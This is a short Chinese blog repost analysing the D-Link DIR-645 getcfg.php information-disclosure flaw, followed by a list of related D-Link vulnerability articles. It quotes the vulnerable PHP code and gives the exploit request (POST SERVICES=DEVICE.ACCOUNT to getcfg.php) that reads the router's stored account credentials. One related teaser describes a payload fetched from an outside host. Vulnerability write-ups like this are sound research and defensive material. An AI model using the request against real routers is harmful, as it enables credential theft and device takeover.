D-Link DIR-645 信息泄露漏洞

最新推荐文章于 2024-04-18 08:51:49 发布
最新推荐文章于 2024-04-18 08:51:49 发布
阅读量485 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/someone9/p/10564909.html
版权

D-Link DIR-645 getcfg.php 文件由于过滤不严格导致信息泄露漏洞。

$SERVICE_COUNT = cut_count($_POST["SERVICES"], ","); TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]); $SERVICE_INDEX = 0; while ($SERVICE_INDEX < $SERVICE_COUNT) { $GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ","); TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);  if ($GETCFG_SVC!="")  {  $file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";  /* GETCFG_SVC will be passed to the child process. */  if (isfile($file)=="1") dophp("load", $file); } $SERVICE_INDEX++; }

这里我们可以看到 $GETCFG_SVC 没有任何过滤直接获取了 POST 传递过来的SERVICES的值。如果$GETCFG_SVC不为空,则进行文件读取。这里我们就可以读取存储此设备信息的DEVICE.ACCOUNT.xml.php文件。

http://IP/getcfg.php

post:SERVICES=DEVICE.ACCOUNT

参考:https://www.cnblogs.com/HacTF/p/8052279.html

 

转载于:https://www.cnblogs.com/someone9/p/10564909.html

weixin_30466039
关注
漏洞复现】友讯D-Link路由器信息泄露漏洞
晚风不及你
01-27 715
友讯电子设备(上海)有限公司于2002年8月13日成立。公司经营范围包括区内以路由器、网络卡、集线器、交换器、转换器等。
D-Link devinfo 信息泄露漏洞(CVE-2024-0717)
m0_50797689的博客
01-25 464
D-Link devinfo 信息泄露漏洞(CVE-2024-0717)
D-Link 5个安全漏洞
systemino的博客
08-25 2343
7月早些时间,研究人员爆出D-link 路由器固件镜像泄露了用来加密专用固件二进制文件的密钥。近日,又有ACE 团队研究人员爆出D-Link路由器的5个严重安全漏洞,攻击者利用这些漏洞可以实现网络入侵。此外,由于部分设备已经不再更新,因此无法修复。 漏洞概述 这些漏洞包括反射型XSS攻击、缓冲区溢出漏洞、认证绕过和任意代码执行,分别是: CVE-2020-15892 CVE-2020-15892漏洞是基于栈的缓冲区溢出漏洞漏洞位于ssi 二进制文件中,可能会引发任意命令执行。 CVE-2020-
D-Link RCE漏洞分析
weixin_43137410的博客
09-08 500
Dir-645任意文件读取漏洞
Yale的博客
05-26 552
本次实验分析及复现的漏洞来自于2017年Hack2Win 黑客竞赛,举办方在公网上提供 D-Link 850L 路由器作为攻击目标,竞赛持续了两个月,最终确定了3个漏洞: Remote Command Execution via WAN and LAN Remote Unauthenticated Information Disclosure via WAN and LAN Unauthorized Remote Code Execution as root via LAN 第三个漏洞受限于环境无法复现,本
D-Link 路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告.pdf
02-28
近日,国家信息安全漏洞共享平台(CNVD)收录了D-Link DIR系列路由器身份验证信息泄露漏洞和远程命令执行漏洞(CNVD-2017-20002、CNVD-2017-20001)。远程攻击者利用漏洞可获取路由器后台登录凭证并执行任意代码。相关利用代码已在互联网公开,受到影响的设备数量根据标定超过20万台,有可能会诱发大规模的网络攻击
DIR-645远程命令执行漏洞
Yale的博客
05-26 985
首先我们分析网上公开的exp确定漏洞相关组件及payload,之后通过IDA分析研究漏洞是如何触发的,最后在attifyos中进行模拟,验证漏洞。 本次实验的漏洞是某品牌路由器service.cgi远程命令执行漏洞。 Packet storm有exp:https://packetstormsecurity.com/files/145859/dlinkroutersservice-exec.txt 看看exp中的关键信息 大概知道需要访问service.cgi,post请求,payload中有event=c
D-Link DIR505路由器溢出漏洞实战
牛叫兽的测试学习和分享
12-14 5109
IOT安全,溢出漏洞学习实践
D-Link DAP-1860:远程命令执行和认证绕过漏洞
NOSEC2019的博客
12-10 925
介绍 2019年9月,我在D-Link Access Point(DAP-1860)上发现了两个漏洞,分别是命令注入导致的远程代码执行和身份验证绕过。这两个漏洞能帮助攻击者在不进行身份验证的情况下远程控制设备。如果你的上网设备是从D-Link购买的,并且型号是DAP-1860,请立刻更新固件或联系厂商寻求帮助,因为我发现的漏洞影响了当时最新版本的DAP-1860固件。 以下是DAP-1860的W...
D-Link系列路由器漏洞挖掘
weixin_30872337的博客
08-13 445
参考 http://www.freebuf.com/articles/terminal/153176.html https://paper.seebug.org/429/ http://www.s3cur1ty.de/m1adv2013-017 http://seclists.org/bugtraq/2013/Dec/11 http://www.devttys0.com/wp-conte...
浅谈D-Link系列路由器漏洞挖掘入门
10-02
主要介绍了浅谈D-Link系列路由器漏洞挖掘入门,详细的介绍了D-Link系列的各种漏洞,具有一定的参考价值,有兴趣的可以了解一下
跟着IPS学信息安全6-DLink HNAP未授权漏洞攻击
sinat_19277729的博客
06-30 545
近年在物联网的迅速兴起下,网络设备的低成本、功能快速迭代需求导致厂商往往更加无暇顾及安全问题,在奇安信披露的安全漏洞中可以看出,该协议在主流路由器厂商的实现中仍然存在大量高危安全漏洞,其中部分高危漏洞利用条件非常低,结合DNS Rebinding等利用方法,极容易被用于大范围钓鱼攻击,控制大量终端形成僵尸网络,大范围影响互联网安全。后续攻击代码大致包含内容是,进入tmp目录,然后从http://45.95.55.xxx下载wget.sh,再执行wget.sh,此时要送入参数selfrep.dlink
揭秘家用路由器0day漏洞挖掘技术读书笔记 D-Link DIR-645 authentication.cgi溢出漏洞分析
houjingyi的博客
10-04 2127
固件下载地址 漏洞描述如下。 上一篇讲了DIR-815 hedwig.cgi中的漏洞成因及利用方式,这一篇来讲DIR-645 authentication.cgi中的漏洞成因及利用方式。下载之后解压缩得到dir645_FW_103.bin,通过binwalk提取出文件系统。 需要分析的还是/htdocs/cgibin这个程序。我们根据POC使用下面的脚本直接进行动态调试。 a
D-link850路由器漏洞挖掘与利用
weixin_43046297的博客
12-28 1911
D-link850文件结构和各部分功能: 分析小型路由器,D-link850是个经典案例,解析完固件后,首先要搞清楚文件系统,可以从前端入手,追踪其数据流向,看前端对应的后端二进制处理文件。 因此我们系统地梳理一下D-link850存在的相关漏洞及发现过程: 敏感信息泄露: 首先我们不知道漏洞的位置,我们仅通过前端的相关信息进行数据流的追踪: 快捷配置界面:bsc_easysetup.php 但是解析后的系统文件夹内有3处有bsc_easysetup.php(web文件下,webinc的bo.
路由器漏洞挖掘之 DIR-805L 越权文件读取漏洞分析
abc380620175的博客
04-24 482
接下来的文章都会实战复现一些关于路由器的 web /二进制漏洞,可能会写的比较细,希望能给大家带来启发。 若这里图片显示不出来可以试试挂个梯子。 前言 本文在复现 DIR-805L 任意文件读取漏洞时,将会比较详细的分析一下用于 cgi 处理的 phpcgi_main 函数其中的一些功能。在逆向 cgibin 二进制文件时,常常会遇到一些用于解析 http 请求的函数,在分析时经常对...
路由器漏洞挖掘之 DIR-850/645 命令执行漏洞复现
abc380620175的博客
06-10 1244
前言 这次来分析两个比较经典的路由器命令执行漏洞DIR-850 和 DIR-645 的 RCE,漏洞成因都是由于参数拼接不当造成的。 漏洞分析 根据前一篇文章中的任意文件读取漏洞,在读取到 DEVICE.ACCOUNT 配置文件中的敏感信息之后,我们就可以进一步利用,达到命令执行的目的,进而 getshell。 php 源代码 代码如下: 这里的 server 变量可控,导致在拼接时...
D-Link DIR645 1.03绕过认证查看配置文件漏洞复现与分析
weixin_43137410的博客
08-26 1287
​ D-Link DIR645的1.03版本固件中存在一个绕过认证查看配置文件的信息泄露漏洞
漏洞复现】D-Link NAS设备nas_sharing.cgi接口存在远程命令执行漏洞CVE-2024-3273
最新发布
失心少年
04-18 222
D-Link DNS-320是中国友讯(D-Link)公司的一款NAS(网络附属存储)设备。D-Link DNS-320L存在命令注入漏洞,该漏洞源于文件/cgi-bin/nas_sharing.cgi存在命令注入漏洞。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。受影响的产品和版本:D-Link DNS-320L,DNS-325,DNS-327,DNS-340L,D-Link NAS Storage。
CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1
2401_84009749的博客
04-04 356
你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值